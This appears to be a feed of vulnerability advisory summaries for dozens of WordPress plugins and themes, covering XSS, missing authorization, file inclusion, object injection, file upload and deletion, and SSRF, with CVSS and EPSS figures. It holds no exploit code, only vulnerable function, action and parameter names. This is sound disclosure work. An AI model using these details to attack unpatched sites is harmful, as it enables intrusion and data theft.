Stored XSS in Make Section & Column Clickable For Elementor WordPress plugin (versions through 2.4) allows authenticated users with high privileges to inject malicious scripts that execute in other users' browsers. The vulnerability requires user interaction (UI:R) and affects site confidentiality, integrity, and availability with limited scope. EPSS score of 0.04% indicates low exploitation probability despite the presence of a public vulnerability disclosure.
Cross-Site Request Forgery in WordPress New User Approve plugin (versions ≤3.2.3) enables unauthenticated remote attackers to trick authenticated administrators into executing unauthorized actions via crafted requests. With EPSS probability of 0.02% (5th percentile) and no evidence of active exploitation (not in CISA KEV), this represents a moderate real-world risk despite a CVSS 7.1 score. The vulnerability requires user interaction (UI:R) but no attacker privileges (PR:N), making it viable through social engineering tactics like phishing emails containing malicious links.
Xagio SEO WordPress plugin through version 7.1.0.35 contains a missing authorization vulnerability that allows authenticated users to perform unauthorized actions due to incorrectly configured access control security levels. The vulnerability has a CVSS score of 4.3 with low real-world exploitation probability (EPSS 0.04%), affecting authenticated users who can bypass intended access restrictions to modify plugin functionality or settings.
Missing authorization in Easy Payment Payment Gateway for PayPal (woo-paypal-gateway) WordPress plugin versions up to 9.0.53 allows unauthenticated remote attackers to access sensitive payment gateway data through improper access control configuration. The vulnerability enables unauthorized information disclosure with low confidentiality impact. EPSS score of 0.04% indicates minimal observed exploitation probability despite network accessibility and no authentication requirement.
Paysera WooCommerce Payment Gateway plugin through version 3.10.0 contains a missing authorization flaw allowing authenticated users with lower privilege levels to access or perform actions intended for higher-privilege roles, resulting in limited information disclosure. The vulnerability stems from incorrectly configured access control checks and has an EPSS score of 0.04% (11th percentile), indicating low real-world exploitation probability despite the CVSS 4.3 rating and authenticated attack vector.
Stored cross-site scripting (XSS) in WP Microdata WordPress plugin version 1.0 and earlier allows authenticated users or lower-privileged administrators to inject malicious scripts that execute in the browsers of site visitors, potentially leading to credential theft, session hijacking, or malware distribution. The vulnerability stems from improper input sanitization during web page generation. EPSS score of 0.04% indicates low exploitation probability in real-world conditions.
Unauthenticated arbitrary file upload vulnerability in File Uploader for WooCommerce (WordPress plugin versions ≤1.0.3) enables remote code execution. Missing file type validation in the 'add-image-data' REST API endpoint allows attackers to upload malicious files to Uploadcare service and retrieve them to the web server, achieving code execution without authentication. Exploitation requires no user interaction or special privileges (CVSS:3.1 AV:N/AC:L/PR:N/UI:N). No public exploit identified at time of analysis.
Unauthenticated attackers can retrieve sensitive Google API keys from the Pretty Google Calendar WordPress plugin (versions up to 2.0.0) by exploiting a missing capability check in the pgcal_ajax_handler() AJAX function. The vulnerability allows direct read access to configured API credentials without authentication, enabling credential harvesting for downstream API abuse. No public exploit code or active exploitation has been confirmed at time of analysis; however, the low CVSS score (5.3) and very low EPSS percentile (21%) reflect that while the vulnerability is real, real-world exploitation likelihood remains minimal due to the ease of detection and limited direct impact compared to data exfiltration or system compromise.
Stored XSS in SlimStat Analytics for WordPress allows unauthenticated attackers to inject malicious scripts via unsanitized 'outbound_resource' parameter in slimtrack AJAX action (versions ≤5.3.2). Injected scripts execute when any user accesses the compromised page, enabling session hijacking, credential theft, or privilege escalation. Affects all installations with publicly accessible AJAX endpoints. No public exploit identified at time of analysis.
Missing authorization in PickPlugins Post Grid and Gutenberg Blocks WordPress plugin (versions through 2.3.17) allows attackers to bypass access control restrictions and exploit incorrectly configured security levels, potentially enabling unauthorized access to protected content or administrative functions. The vulnerability stems from broken access control (CWE-862) with no public exploit code confirmed at time of analysis, though EPSS scoring of 0.04% suggests minimal real-world exploitation probability despite the authorization flaw.
DOM-based cross-site scripting (XSS) in Crocoblock JetElements For Elementor plugin versions up to 2.7.12 allows attackers to inject malicious scripts into web pages through improper input neutralization during page generation. The vulnerability affects WordPress sites using this Elementor page builder extension and can enable session hijacking, credential theft, or malware distribution against site visitors. EPSS exploitation probability is low at 0.04%, but the attack vector is likely network-based requiring no authentication.
Authorization bypass in RadiusTheme Radius Blocks WordPress plugin through version 2.2.1 allows attackers to exploit incorrectly configured access control security levels via user-controlled keys, enabling unauthorized access to restricted functionality. The vulnerability is classified as an insecure direct object reference (IDOR) issue affecting the plugin's access control implementation. While no CVSS score is available and EPSS indicates low exploitation probability (0.04%), the vulnerability demonstrates a fundamental authentication design flaw that could permit escalation of privileges within WordPress installations using this plugin.
Authorization bypass in PickPlugins Post Grid and Gutenberg Blocks WordPress plugin through version 2.3.23 allows attackers to exploit incorrectly configured access control via user-controlled keys, potentially enabling unauthorized access to post content or plugin functionality. The vulnerability is classified as CWE-639 (Authorization Through User-Controlled Key) and presents a low exploitation probability (EPSS 0.04%, 13th percentile) with no public exploit code or active exploitation confirmed at time of analysis.
Sermon Manager for WordPress plugin through version 2.30.0 allows unauthenticated attackers to exploit missing authorization checks to access or modify sermon data due to incorrectly configured access control security levels. The vulnerability stems from CWE-862 (Missing Authorization) and affects all installations running the vulnerable version range. With an EPSS score of 0.04% (13th percentile), real-world exploitation probability is minimal despite the permission-based nature of the flaw.
WP AI CoPilot plugin for WordPress versions through 1.2.7 exposes sensitive information embedded within sent data, allowing attackers to retrieve confidential details without proper access controls. The vulnerability stems from inadequate handling of sensitive data in communications, classified as information disclosure with an EPSS score of 0.04% indicating low real-world exploitation probability. No public exploit code has been identified at time of analysis.
Missing authorization controls in Sparkle FSE WordPress theme versions 1.0.9 and earlier allow unauthenticated attackers to bypass access control restrictions and perform unauthorized actions through exploitable endpoint misconfigurations. This authentication bypass vulnerability, reported by Patchstack security researchers, affects all instances of the Sparkle FSE theme up to version 1.0.9 with low exploit probability (EPSS 0.05%) but represents a direct authorization failure (CWE-862) that could enable unauthorized data access or modification depending on endpoint exposure.
Missing authorization controls in sparklewpthemes Construction Light WordPress theme versions 1.6.7 and earlier allow unauthenticated attackers to bypass access restrictions and access resources that should be protected by role-based access control. The vulnerability stems from incorrectly configured access control security levels, potentially exposing sensitive functionality or data to unauthorized users.
PHP object injection in PDF for Elementor Forms WordPress plugin (versions ≤6.5.0) enables unauthenticated remote attackers to execute arbitrary code or manipulate application state through unsafe deserialization of user-controlled data. EPSS probability is low (0.06%, 19th percentile), and no public exploit identified at time of analysis. However, the unauthenticated remote attack vector (CVSS AV:N/PR:N) and high confidentiality impact warrant immediate patching for sites using this plugin.
Object injection via unsafe deserialization in PDF Invoice Builder for WooCommerce plugin allows authenticated attackers with low privileges to execute arbitrary PHP code, manipulate application objects, or trigger other malicious actions. Affects all versions through 6.5.0. No public exploit identified at time of analysis, with EPSS probability of 0.07% suggesting minimal real-world exploitation activity despite high CVSS score.
Object injection via unsafe deserialization in PDF for WPForms plugin (versions ≤6.5.0) enables authenticated attackers to execute arbitrary PHP code or manipulate application state. The CVSS score of 8.8 reflects network-based exploitation with low complexity requiring only low-privileged authentication. EPSS probability of 0.07% (22nd percentile) suggests limited exploitation likelihood. No public exploit code or CISA KEV listing identified at time of analysis, indicating this remains a theoretical risk requiring proactive patching.
Object injection via unsafe deserialization in PDF for Contact Form 7 WordPress plugin (versions ≤6.5.0) allows authenticated attackers to execute arbitrary PHP code or manipulate application state. Attack requires low-privileged user credentials but no user interaction, with network-accessible attack vector. EPSS probability remains low (0.07%, 22nd percentile) and no active exploitation confirmed at time of analysis. Publicly available exploit code exists per Patchstack disclosure.
PHP object injection in PDF for Gravity Forms + Drag And Drop Template Builder (WordPress plugin) versions up to 6.5.0 allows authenticated attackers with low privileges to execute arbitrary code or manipulate application logic via unsafe deserialization. CVSS 7.5 (High) but EPSS probability of 0.07% (22nd percentile) indicates low observed exploitation likelihood. No public exploit identified at time of analysis, and attack requires high complexity (AC:H) with authenticated access (PR:L).
Local file inclusion (LFI) in Task Manager WordPress plugin versions ≤3.0.2 allows unauthenticated remote attackers to read arbitrary files from the server through improper filename control in PHP include/require statements. With a 7.5 CVSS score but only 0.06% EPSS (18th percentile), this represents high theoretical impact with low observed exploitation probability. No confirmed active exploitation (not in CISA KEV) or public exploit code identified at time of analysis. Patchstack security research disclosed this vulnerability affecting the Agence web Eoxia Task Manager plugin.
Local file inclusion in Ray Enterprise Translation WordPress plugin (versions ≤1.7.1) allows unauthenticated remote attackers to read arbitrary files from the server. CVSS 7.5 HIGH due to network-accessible exploitation with no authentication required. EPSS score of 0.06% (20th percentile) indicates low observed exploitation probability. No active exploitation confirmed (not in CISA KEV); no public exploit identified at time of analysis. Despite high CVSS, real-world risk appears moderate given low EPSS and information disclosure-only impact.
Local file inclusion in Riode WordPress theme versions up to 1.6.23 allows remote attackers to read arbitrary files on the server through improper PHP file inclusion controls. The vulnerability requires user interaction (UI:R) but no authentication (PR:N), enabling unauthorized access to sensitive configuration files, credentials, or source code. EPSS score of 0.06% (18th percentile) indicates low observed exploitation probability; no public exploit identified at time of analysis and not listed in CISA KEV.
Local File Inclusion (LFI) in BZOTheme Monki WordPress theme versions through 2.0.5 allows unauthenticated remote attackers to include and execute arbitrary PHP files on the server, potentially leading to remote code execution, information disclosure, or complete system compromise. Despite the high 8.1 CVSS score, real-world exploitation probability remains low (EPSS 0.17%, 38th percentile) with no confirmed active exploitation or public exploit code identified at time of analysis. The vulnerability stems from improper filename validation in PHP include/require statements, classified as CWE-98.
Gutenberg Essential Blocks plugin for WordPress up to version 5.7.2 allows authenticated authors and above to access sensitive API keys for Instagram, Google Maps, and other external services due to missing capability checks on several callback functions. The vulnerability requires WordPress Author-level or higher privileges and carries a low real-world risk given the constrained attack surface and low EPSS score of 0.04%, though it does expose plaintext credentials to a wider internal threat model than intended.
Authorization bypass in Essential Real Estate WordPress plugin versions through 5.2.9 allows authenticated users to access sensitive real estate data they should not have permission to view through user-controlled key manipulation. The vulnerability exploits incorrectly configured access control at the application level, enabling privilege escalation from a standard user account to view confidential information such as property details or pricing. No public exploit code has been identified, and the EPSS score of 0.04% indicates low exploitation probability despite the CVSS 6.5 severity rating.
Stored cross-site scripting (XSS) in VK Google Job Posting Manager WordPress plugin versions up to 1.2.22 allows authenticated users with low privileges to inject malicious scripts that execute in the context of other users' browsers, potentially compromising site administrators. The vulnerability requires user interaction (clicking a link or viewing a malicious page) to trigger payload execution and affects the plugin's web page generation functionality. EPSS probability of exploitation is notably low at 0.04%, suggesting this is primarily a theoretical risk without documented active exploitation.
SQL injection in LambertGroup LBG Zoominoutslider WordPress plugin versions ≤5.4.4 enables authenticated attackers with low privileges to execute arbitrary SQL commands with potential for cross-site impact. The vulnerability carries an 8.5 CVSS score but shows low real-world exploitation probability (EPSS 0.04%, 14th percentile) with no confirmed active exploitation or public proof-of-concept code identified at time of analysis.
Stored cross-site scripting (XSS) in Premio Stars Testimonials WordPress plugin versions 3.3.4 and below allows authenticated users to inject malicious scripts that execute in the context of other users' browsers, potentially compromising site administrators or visitors. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting immediate risk, but the stored nature means injected payloads persist and affect multiple users. No public exploit code or active KEV status is documented, though the 6.5 CVSS score reflects moderate severity when considering cross-site impact.
Missing authorization in NinjaTeam FileBird Pro WordPress plugin versions up to 6.5.1 allows authenticated users to access and modify files they should not have permission to view or edit due to incorrectly configured access control security levels. The vulnerability requires valid user credentials but can lead to disclosure and modification of sensitive files within the plugin's file management interface. EPSS exploitation probability is low at 0.04%, and no public exploit code has been identified at the time of analysis.
Broken access control in Yaad Sarig Payment Gateway for WooCommerce (versions ≤2.2.11) allows unauthenticated remote attackers to bypass authorization checks and gain unauthorized access to payment gateway functions. With CVSS 9.1 (Critical) scoring reflecting network-accessible exploitation requiring no privileges or user interaction, attackers can read or modify sensitive payment data. EPSS score of 0.04% (14th percentile) suggests low observed exploitation probability despite severity. No public exploit identified at time of analysis, though the authentication bypass tag indicates potential for unauthorized transaction manipulation or data exposure in WordPress e-commerce environments.
Missing authorization in g5theme Essential Real Estate WordPress plugin version 5.2.9 and earlier allows authenticated users to access or modify restricted resources by exploiting inadequately configured access controls. An attacker with low-privilege WordPress account credentials can leverage the broken access control to view sensitive information and make unauthorized modifications without requiring administrative approval. No public exploit code is currently identified, though the vulnerability is documented in the Patchstack security database.
Unauthenticated remote attackers can bypass access controls in ZEEN101 Leaky Paywall WordPress plugin versions up to 4.22.6, gaining unauthorized access to restricted content through incorrectly configured security levels. The vulnerability requires no user interaction and can be exploited over the network, though it is limited to information disclosure (CVSS 5.3, EPSS 0.04%). No public exploit code or active exploitation has been identified at time of analysis.
Missing authorization in WP Compress for MainWP plugin versions up to 6.50.17 allows unauthenticated remote attackers to modify plugin settings due to incorrectly configured access control, affecting integrity of compressed content and plugin configuration without requiring authentication or user interaction.
Broken access control in ThemeFusion Avada WordPress theme through version 7.13.2 allows authenticated attackers with low privileges to access functionality improperly constrained by access control lists, potentially achieving full site compromise. With CVSS 8.8 (High) due to network-based access requiring only low-privilege authentication, attackers can achieve high confidentiality, integrity, and availability impact. EPSS probability remains low at 0.06% (18th percentile), and no public exploit identified at time of analysis, suggesting limited immediate exploitation risk despite the critical CVSS rating.
Unauthenticated remote attackers can access sensitive sitemap data in Google XML Sitemaps WordPress plugin versions through 4.1.22 due to missing authorization checks on sitemap endpoints. The vulnerability allows unauthorized information disclosure of site structure and indexed pages without requiring authentication or user interaction. While the CVSS score is moderate (5.3), real-world exploitation probability is very low (EPSS 0.04th percentile), suggesting this is primarily an information disclosure risk rather than an active threat.
WCFM Marketplace plugin through version 3.7.1 fails to properly enforce authorization controls, allowing authenticated users with limited privileges to cause denial of service or access functionality they should not have. The vulnerability affects the WordPress plugin across all installations through the specified version, exploiting incorrectly configured access control security levels via network-accessible endpoints. With an EPSS score of 0.05% and low real-world exploitation probability, this represents a privilege escalation risk primarily for multi-vendor marketplace administrators.
Open redirect vulnerability in wpWax Directorist WordPress plugin versions up to 8.6.6 allows unauthenticated remote attackers to redirect users to arbitrary external websites via crafted URL parameters, enabling phishing attacks. The vulnerability requires user interaction (clicking a malicious link) but has a network attack vector with low complexity. EPSS exploitation probability is very low at 0.04%, and no active exploitation or public proof-of-concept has been identified.
Missing authorization in the WordPress Read More & Accordion plugin (expand-maker) versions 3.5.5.1 and earlier allows authenticated users to access restricted functionality through incorrectly configured access controls, potentially revealing sensitive information. The vulnerability requires user authentication and network access but carries a CVSS score of 6.5 due to high confidentiality impact, though real-world exploitation probability remains low at 0.04% EPSS. No public exploit code or active exploitation has been identified at time of analysis.
Inadequately configured access control in Easy Property Listings WordPress plugin versions 3.5.21 and earlier allows authenticated users to access sensitive information they should not be authorized to view. An authenticated attacker with user-level privileges can bypass authorization checks to read property listing data or other restricted content due to missing authorization validation on API endpoints or functionality. EPSS exploitation probability is very low at 0.04%, and no public exploit code has been identified, indicating limited real-world threat despite the authentication-bypass tag.
Authenticated users with limited privileges can access search and replace functionality in CM On Demand Search And Replace WordPress plugin (versions up to 1.5.5) due to missing authorization checks on restricted features. An attacker with basic user credentials can perform privileged actions intended only for administrators, affecting data confidentiality through unauthorized content access. This is confirmed as an authentication bypass vulnerability with low real-world exploitation probability (EPSS 0.04%) despite the missing authorization flaw.
Missing authorization in WCFM - Frontend Manager for WooCommerce through version 6.7.24 allows authenticated users with limited privileges to bypass access controls via incorrectly configured security levels, enabling read-only disclosure of sensitive information. The vulnerability requires user interaction and has a low EPSS score (0.03%, 10th percentile), indicating minimal real-world exploitation probability despite the authentication requirement.
Authenticated attackers with Contributor-level access or above can delete or generate featured images on posts they do not own in the Auto Featured Image (Auto Post Thumbnail) WordPress plugin through version 4.2.1, due to a missing capability check in the bulk_action_generate_handler function. The vulnerability requires user authentication and has a CVSS score of 4.3; no public exploit code or active exploitation has been confirmed at the time of analysis.
Reflected cross-site scripting (XSS) in WPS Visitor Counter WordPress plugin through version 1.4.8 allows remote attackers to inject malicious scripts via the REQUEST_URI parameter, which is output without sanitization in HTML attributes. The vulnerability has a CVSS score of 5.8 and requires user interaction (clicking a crafted link), with exploitation limited primarily to older web browsers due to modern XSS protections. No public exploit code or active exploitation has been identified at the time of analysis.
The HAPPY Helpdesk Support Ticket System WordPress plugin up to version 1.0.9 allows authenticated attackers with Subscriber-level access to submit replies to arbitrary support tickets by bypassing authorization checks on the 'submit_form_reply' AJAX action. The vulnerability stems from missing capability validation before processing ticket replies, enabling low-privileged users to manipulate the 'happy_topic_id' parameter and interact with tickets they do not own or are not assigned to. While the CVSS score of 4.3 reflects low-to-medium severity with integrity impact only, the EPSS percentile of 13% and absence of evidence of active exploitation suggest this is not an immediate critical priority, though it should be patched to prevent unauthorized ticket interference.
PHP object injection in Doubly Cross Domain Copy Paste plugin (≤1.0.46) allows authenticated attackers with Subscriber-level privileges to execute arbitrary code via deserialized untrusted input from uploaded ZIP archives. Exploitation requires administrators to explicitly enable Subscriber access. Available POP chains enable code execution, file deletion, and sensitive data retrieval. Attack vector requires low privilege (PR:L) authentication with network accessibility and no user interaction. No public exploit identified at time of analysis.
Unauthorized data modification in AnnunciFunebri Impresa WordPress plugin through version 4.7.0 allows authenticated subscribers to reset all plugin options via the missing capability check on annfu_reset_options() function. Attackers with Subscriber-level access can delete all 29 plugin configuration options, reverting the plugin to default state without administrative authorization. No public exploit code or active exploitation has been identified at time of analysis.
Popup Builder (Easy Notify Lite) plugin for WordPress versions up to 1.1.37 allows authenticated attackers with Subscriber-level access to reset plugin settings to default values due to missing capability checks in the easynotify_cp_reset() function. The vulnerability requires user authentication and does not grant elevated privileges or information disclosure, resulting in a CVSS score of 5.4 (medium severity). No public exploit code or active exploitation has been identified at time of analysis, though the issue poses moderate risk to WordPress installations relying on plugin configuration integrity.
Authentication bypass in JAY Login & Register plugin for WordPress versions ≤2.4.01 allows unauthenticated remote attackers to impersonate any site user, including administrators, by exploiting flawed cookie validation in the user-switching function. Attackers require only knowledge of target user IDs to gain complete account access without credentials. No public exploit identified at time of analysis.
Authenticated attackers with Subscriber-level access can modify tracking settings in the Employee Spotlight WordPress plugin (versions up to 5.1.3) due to missing authorization checks in the employee_spotlight_check_optin() function. The vulnerability allows privilege escalation to perform account integrity modifications that should require administrator approval, affecting all installations of this plugin without patches applied.
Simple Bike Rental WordPress plugin versions up to 1.0.6 allow authenticated subscribers to retrieve sensitive customer booking data due to missing capability checks on the 'simpbire_carica_prenotazioni' AJAX action. Attackers with subscriber-level access can exfiltrate personally identifiable information including names, email addresses, and phone numbers from all booking records. CVSS 4.3 reflects the moderate severity of unauthorized information disclosure without requiring administrative access.
Authenticated attackers with Subscriber-level access can duplicate arbitrary WordPress posts via the PDF for Contact Form 7 + Drag and Drop Template Builder plugin (versions up to 6.3.3) due to missing capability checks in the 'rednumber_duplicate' function. This allows disclosure of sensitive content including password-protected and private posts. The vulnerability requires authentication but exploits insufficient privilege validation, creating a post enumeration and information disclosure risk for multi-user WordPress installations. No public exploit code or active exploitation has been confirmed at the time of analysis.
WP Fastest Cache Premium plugin versions up to 1.7.4 contain a Server-Side Request Forgery (SSRF) vulnerability in the 'get_server_time_ajax_request' AJAX action that allows authenticated Subscriber-level users to send arbitrary web requests originating from the server, potentially enabling reconnaissance and manipulation of internal services. The free version is unaffected. No public exploit code has been identified at time of analysis, with a very low EPSS score of 0.04% indicating minimal real-world exploitation likelihood despite the authenticated attack vector.
Stored Cross-Site Scripting in WP Job Portal plugin for WordPress up to version 2.4.4 allows authenticated attackers with Editor-level access or higher to inject arbitrary JavaScript into job description fields by exploiting explicit whitelisting of the `<script>` tag in the WPJOBPORTAL_ALLOWED_TAGS configuration. The injected scripts execute when users view affected job listings, enabling session hijacking, credential theft, and other malicious activities. Impact is limited to multi-site installations or sites with unfiltered_html disabled. CVSS score of 4.4 reflects the high privilege requirement (PR:H) and high attack complexity (AC:H), though the vulnerability affects a potentially large number of WordPress installations.
Cross-Site Request Forgery in Resource Library for Logged In Users WordPress plugin (all versions up to 1.5) allows unauthenticated attackers to perform unauthorized administrative actions including creating, editing, and deleting resources and categories by tricking a site administrator into clicking a malicious link. The vulnerability stems from missing nonce validation on multiple administrative functions. With an EPSS score of 0.02% and low real-world exploitation probability despite the CVSS 4.3 score, this represents a lower-priority vulnerability requiring user interaction and administrative privileges on the target site.
Arbitrary file deletion in Multi Uploader for Gravity Forms (WordPress plugin ≤1.1.7) allows unauthenticated remote attackers to delete any file on the server through insufficient path validation in the plupload_ajax_delete_file function. Exploitation requires no credentials or user interaction. CVSS 9.8 Critical severity reflects network-accessible attack with high impact to confidentiality, integrity, and availability. Low observed exploitation activity (EPSS 0.37%). No public exploit identified at time of analysis.
Authenticated attackers with WordPress Subscriber-level access and above can modify arbitrary plugin settings in the Vimeo SimpleGallery plugin versions up to 0.2 due to missing authorization checks on the vimeogallery_admin function. The vulnerability allows privilege escalation within WordPress, enabling lower-privileged users to alter plugin configurations they should not have access to. No public exploit code or active exploitation has been identified at the time of analysis.
BuddyTask plugin for WordPress versions up to 1.3.0 fails to enforce capability checks on multiple AJAX endpoints, allowing authenticated subscribers and above to view, create, modify, and delete task boards in any BuddyPress group regardless of membership or group privacy settings. The CVSS 5.4 (Medium) rating reflects confidentiality and integrity impacts limited to group task data with low attack complexity and no user interaction required, though the actual organizational risk depends on BuddyPress deployment scope and task board sensitivity.
Stored Cross-Site Scripting in Bold Timeline Lite WordPress plugin up to version 1.2.7 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the 'title' parameter of the 'bold_timeline_group' shortcode, executing malicious scripts whenever users view affected pages. CVSS 6.4 reflects moderate impact (confidentiality and integrity compromise across trust boundaries); EPSS 0.04% indicates low real-world exploitation probability. No public exploit code or active exploitation confirmed.
Arbitrary file read in WatchTowerHQ WordPress plugin versions up to 3.16.0 allows authenticated administrators with valid access tokens to read sensitive server files via path traversal in the 'wht_download_big_object_origin' parameter. The vulnerability exploits insufficient path validation in the handle_big_object_download_request function, potentially exposing database credentials and authentication keys. No public exploit code or active exploitation has been confirmed at time of analysis.
Stored Cross-Site Scripting in BUKAZU Search widget plugin for WordPress allows authenticated attackers with Contributor-level access and above to inject arbitrary JavaScript through the 'shortcode' parameter of the 'bukazu_search' shortcode. The vulnerability affects all versions up to and including 3.3.2 and results from insufficient input sanitization and output escaping. Malicious scripts execute in the context of any user accessing affected pages. EPSS score of 0.04% indicates low real-world exploitation probability despite moderate CVSS 6.4 severity.
Stored Cross-Site Scripting in NewStatPress WordPress plugin versions up to 1.4.3 allows authenticated attackers with contributor-level or higher privileges to inject arbitrary JavaScript into pages via a regex bypass in the nsp_shortcode function. When site visitors access pages containing the injected malicious shortcode attribute, the attacker's script executes in their browsers, enabling session hijacking, credential theft, or malware distribution. No public exploit code has been identified; EPSS score of 0.04% reflects the requirement for authenticated access and user interaction.
Premmerce Wishlist for WooCommerce plugin versions up to 1.1.10 fails to enforce authorization checks on the deleteWishlist() function, allowing authenticated Subscriber-level users to delete arbitrary wishlists belonging to other users. The vulnerability stems from missing capability validation rather than authentication bypass; while the CVSS vector indicates unauthenticated access (PR:N), the description specifies Subscriber-level authentication is required, suggesting the vector may reflect the function's accessibility rather than actual authentication bypass. With EPSS of 0.04% and no public exploit code identified, real-world exploitation risk is minimal despite the authorization flaw.
Arbitrary file deletion in WP User Manager plugin versions up to 2.9.12 allows authenticated attackers with Subscriber-level privileges to delete critical files via improper validation of the 'current_user_avatar' parameter when custom avatar functionality is enabled. The vulnerability exploits PHP's filter_input() function's handling of array inputs combined with insufficient path validation, enabling a two-stage attack that can facilitate remote code execution by deleting essential files. No public exploit code has been identified at the time of analysis, though the low EPSS score (0.29%) suggests limited real-world exploitation likelihood despite the moderate CVSS rating.
Unauthenticated attackers can modify plugin settings and create arbitrary filter options in the Filter Plus plugin for WordPress (versions up to 1.1.6) due to missing capability checks on AJAX actions 'filter_save_settings' and 'add_filter_options'. This allows unauthorized data modification with no confidentiality impact but enables attackers to alter product filtering functionality without authentication. The vulnerability has a low EPSS score (0.08%, 23rd percentile) despite network accessibility, indicating limited real-world exploitation likelihood.
Authenticated arbitrary file upload in Infility Global WordPress plugin versions ≤2.14.42 permits remote code execution. The upload_file function accepts spoofed MIME types without verifying file extensions, while import_data lacks capability checks, allowing subscriber-level users to upload malicious files (e.g., PHP webshells) to the server. CVSS:3.1 score 8.8 (High) reflects network-accessible, low-complexity exploitation requiring only low-privilege authentication. No public exploit identified at time of analysis. EPSS 0.35% indicates low observed exploitation activity.
Unauthenticated payment bypass in Campay Woocommerce Payment Gateway plugin (versions up to 1.2.2) allows remote attackers to mark orders as successfully completed without actually processing payment, directly resulting in financial loss. The vulnerability stems from insufficient transaction validation in the payment processing workflow, enabling attackers to manipulate order status through the payment gateway interface.
Reflected cross-site scripting (XSS) in Accept Stripe Payments Using Contact Form 7 WordPress plugin versions up to 3.1 allows unauthenticated attackers to inject arbitrary JavaScript via the 'failure_message' parameter due to insufficient input sanitization and output escaping. An attacker can craft a malicious link that, when clicked by a victim, executes JavaScript in the victim's browser session with access to sensitive data or session tokens. No public exploit code or active exploitation has been confirmed at the time of analysis.
Stored cross-site scripting in Better Elementor Addons plugin for WordPress up to version 1.5.5 allows authenticated attackers with contributor-level or higher privileges to inject arbitrary JavaScript through insufficiently sanitized Slider widget attributes, which executes when any user views the affected page. This is a stored XSS vulnerability affecting a widely-deployed WordPress plugin; no public exploit code or active exploitation has been confirmed at time of analysis, but the low CVSS complexity (AC:L) and moderate EPSS exploitation probability make this a practical concern for any WordPress site running the vulnerable plugin versions with user roles permitted to edit pages.
Premmerce Brands for WooCommerce plugin versions up to 1.2.13 allow authenticated attackers with Subscriber-level access to modify brand permalink settings due to a missing capability check in the saveBrandsSettings function. The vulnerability requires only network access and low-privilege authentication, enabling unauthorized data modification of WordPress brand configuration without user interaction.
WP Job Portal plugin for WordPress allows authenticated attackers with Subscriber-level access to read arbitrary files on the server through path traversal in the 'downloadCustomUploadedFile' function, potentially exposing sensitive configuration files, database credentials, or other confidential data. The vulnerability affects all versions up to and including 2.4.0, with CVSS 6.5 reflecting the high confidentiality impact but low attack complexity and requirement only for basic authenticated access.
WPForms Google Sheet Connector plugin through version 4.0.0 allows unauthenticated remote attackers to modify data by exploiting missing authorization checks on access control mechanisms. The vulnerability enables unauthorized manipulation of form submissions and Google Sheet integrations without proper permission validation, affecting WordPress installations using this plugin.
Deserialization of untrusted data in WP Maps WordPress plugin versions up to 4.8.6 allows high-privileged authenticated users to inject and instantiate arbitrary PHP objects, potentially leading to code execution or privilege escalation. While the CVSS score of 6.5 reflects high confidentiality and integrity impact, the requirement for administrator-level privileges (PR:H) and user interaction (UI:R) significantly constrains real-world exploitability. EPSS score of 0.04% indicates minimal observed exploitation likelihood despite the vulnerability's technical severity.
Happy Addons for Elementor through version 3.20.3 allows authenticated users to access functionality they should not have permission to use due to missing authorization checks on API endpoints or admin functions. The vulnerability requires valid user authentication and results in information disclosure, with a CVSS score of 4.3 and an extremely low EPSS exploitation probability of 0.04%, suggesting minimal real-world attack incentive despite the access control flaw.
DOM-based cross-site scripting (XSS) in muffingroup Betheme WordPress theme versions up to 28.2 allows authenticated attackers with low privileges to inject malicious scripts that execute in the context of other users' browsers. The vulnerability requires user interaction (UI:R) and affects the confidentiality, integrity, and availability of affected installations; EPSS exploitation probability is low at 0.04%, and no public exploit code or active exploitation has been confirmed.
Local File Inclusion in Dream-Theme's The7 WordPress theme (versions prior to 12.8.1.1) allows authenticated attackers with low privileges to read arbitrary server files through improper filename validation in PHP include statements. With a 0.17% EPSS score and no confirmed active exploitation, this represents a moderate risk primarily in shared hosting environments where authenticated users exist. The 7.5 CVSS score reflects high confidentiality and integrity impact, though exploitation requires high attack complexity and authenticated access.
DOM-based cross-site scripting in Dream-Theme The7 WordPress theme versions before 12.9.0 allows authenticated users to inject malicious scripts that execute in the context of other users' browsers via improperly sanitized input during web page generation. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting real-world exploitability despite a moderate CVSS score of 6.5. EPSS exploitation probability is low at 0.04th percentile, and no public exploit code or active exploitation has been reported.
Insertion of sensitive information into sent data in auxin-elements WordPress plugin versions up to 2.17.15 allows unauthenticated remote attackers to retrieve embedded sensitive data through network-accessible responses. The vulnerability exposes information with low confidentiality impact and affects the Shortcodes and extra features for Phlox theme plugin across all versions through 2.17.15, with EPSS scoring indicating 0.04% likelihood of exploitation.
Improper HTML tag neutralization in sevenspark Contact Form 7 - Dynamic Text Extension through version 5.0.5 allows unauthenticated remote attackers to inject malicious scripts via a network-based attack with no user interaction required, resulting in confidentiality compromise through information disclosure. The vulnerability is classified as cross-site scripting (XSS) with low exploitability probability (EPSS 0.06%, percentile 18%), suggesting limited real-world attack incentive despite the network-accessible attack vector.
Porto Theme - Functionality plugin for WordPress (versions before 3.7.3) allows authenticated users to access sensitive information through broken access control, enabling privilege escalation or information disclosure without proper authorization checks. While the vulnerability requires valid WordPress credentials and has low CVSS severity (4.3), the confirmed patch availability and authentication requirement reduce immediate risk. No public exploit code or active exploitation has been identified at the time of analysis.
Stored cross-site scripting (XSS) in Porto Theme - Functionality plugin for WordPress allows authenticated users with low privileges to inject malicious scripts into web pages that execute in the browsers of other site visitors. The vulnerability affects Porto Theme - Functionality versions below 3.7.3 and has a low exploitation probability (EPSS 0.01%), but requires user interaction and authenticated access to exploit, limiting immediate risk to well-managed WordPress installations with access controls.
Media Library Assistant WordPress plugin through version 3.29 allows authenticated users to bypass authorization controls and access or modify content they should not have permission to reach via user-controlled keys in access control mechanisms. The vulnerability requires an authenticated user with limited privileges (PR:L) and affects confidentiality and integrity of stored media library data, though with relatively low exploitation probability (EPSS 0.04%) and no confirmed active exploitation at time of analysis.
Custom Field Template WordPress plugin through version 2.7.6 exposes sensitive system information to high-privilege local users via embedded data retrieval, allowing administrators to access confidential data they should not have access to. The vulnerability requires high administrative privileges and local access, limiting real-world exploitation risk despite the complete confidentiality impact. EPSS probability is minimal at 0.02%, indicating low likelihood of opportunistic exploitation.
